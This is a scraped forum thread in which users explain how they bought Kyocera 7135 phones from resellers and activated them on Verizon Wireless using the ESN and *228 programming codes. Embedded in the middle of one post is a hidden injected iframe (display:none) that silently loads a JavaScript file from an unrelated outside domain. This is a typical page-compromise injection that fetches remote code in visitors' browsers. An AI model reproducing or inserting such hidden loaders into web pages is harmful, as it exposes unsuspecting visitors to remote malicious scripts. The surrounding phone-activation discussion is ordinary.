+ Reply to Thread

Initializing on VZW

OK, so IF I somehow got a 7135 -- not from Alltel -- how does one go about getting it to work with VZW?

Do all the features work on VZW? Including hi speed internet browsing?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

All of the features have worked just fine for me with the exception of the Express Network. I have not tried the Express network because it is far too expensive for me. Everything else works just fine, WAP, CSD, SMS, QNC.

I love this phone.

Nathan,
    Thanks for the reply. I have a ton of questions, mostly dumb. Can do privately if you prefer.

1) Where did you get your 7135?
    2) How do you get it to work on VZW? Just call them? What info do you need?
    3) Do you have to program the phone based on info they give you?

That's a start ...

BobH

Search on this forum, there is a ton of information. For me:

1) I got mine from Getconnected.com for $649.00 plus shipping.

2) I went to the local Verizon store, they scanned in the ESN from the phone, ID'd it as a 6035 and dialed *22800 to force it to search on Verizon network for Options 1 and 2 downloads

3) All programming is done via Options 1 and 2 on *228. As I stated in 2 above, initially had to dial *22800 (VZW is A Carrier in Atlanta) then picked Option 1 first, let it beep and hang up on its own. Then redialed *228 this time and did Option 2 and let it beep and hang up itself.

This worked for me and from my reading worked for others as well. You may have to dial *22801 depending upon what carrier VZW is in your area. This is why I did it at the store, I just ask the clerk the question.

Hope this helps.

Mark

7135 runnig on VZW

I also got mine from Getconnected.com for $649.00 plus shipping.

2) Call Verizon 1-800-922-0204, they ask for my ESN number from the phone, ID'd it as a 6035 and dialed I then did *22800 to force it to search on Verizon network for Options 1 and 2 downloads

This phone replaced at cell phone a palm 505 and a Motorola Timeport now I have one 7135, I also added call back phone number options on voice mail to my plan and I can used the phone like a pager and call them right back!!! THis is a wounderful Phone.

Mike

Does it matter where I am? I couldn't find the 7135 on Getconnected.com, I presume because there isn't a service in Minneapolis that supports the 7135. It doesn't seem to have a search engine. VZW in Minnesota doesn't offer the Express Network. At least yet, and, course, they won't tell you if or when they will. So, even if I bought one from GC, is there a possibility I couldn't get it activated here?

I did. <--- Says Markito from Minnesota
    ~'kito
    pdaPhoneHome Moderator

I figured YOU would ... unless Christine brought you one from Boston! Did you have to call GC to buy it, or did you find it on their web site? (& if so, where?).

BTW, how is the html browsing here?

bh

7135 Pricing

Originally posted by Bobh

1) Where did you get your 7135?

BobH

I got my 7135 from Central Cellular (316) 284-0900.

I paid $649 plus shipping.

They have been very helpful on follow up support as well.

Administrator
    are they an altell reseller?

Originally posted by marctronixx
    are they an altell reseller?

YES, they are, I am pretty sure. Because mine came with Alltel PRL loaded on it and Alltel logo.